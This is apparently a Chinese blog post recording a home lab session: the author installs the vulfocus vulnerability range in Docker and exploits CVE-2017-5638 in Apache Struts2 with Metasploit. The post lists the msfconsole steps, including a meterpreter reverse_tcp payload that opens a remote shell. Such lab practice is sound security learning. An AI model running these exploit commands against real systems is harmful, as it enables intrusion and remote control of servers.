開源漏洞靶場vulfocus的實踐(一)
本周末實踐的是開源漏洞靶場vulfocus,真是簡單易用,以下是實踐記錄,
搞個ubuntu18.04的虛擬機,安裝docker,
sudo apt install docker.io,
sudo systemctl enable docker,
sudo gpasswd -a ubuntu docker,
newgrp docker,
下載vulfocus容器鏡像,docker pull vulfocus/vulfocus:latest,
啟動vulfocus容器實例,
docker run -d -p 8001:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=10.90.11.162 vulfocus/vulfocus,
這就可以訪問vulfocus的管理界面了,http://10.90.11.162:8001,
admin/admin,登錄進去,首先看鏡像管理,開始是空的,點擊一鍵同步,就都出來了,

我習慣用cve-2017-5638做實驗,搜一下看有沒有,

搜出來的可以點擊下載,就自動導入了,也可以手動導入本地的鏡像,因為我拿vulfocus自帶的cve-2017-5638鏡像做攻擊驗證沒成功,就又自己手動導入的piesecurity/apache-struts2-cve-2017-5638,

導入鏡像成功后,主頁上就能看到并可以啟動了,

本地安裝個metasploit,進行攻擊實驗,
msfconsole,
use exploit/multi/http/struts2_content_type_ognl,
set RHOST 10.90.11.162,
set RPORT 34351,
set TARGETURI showcase.jsp,
set LHOST 10.90.11.162,
set payload linux/x64/meterpreter/reverse_tcp,
exploit,
這里需要特別注意的是,需要自己手動docker ps看一下靶機的映射端口,
并通過set RPORT進行配置,攻擊成功了就是下面這樣,
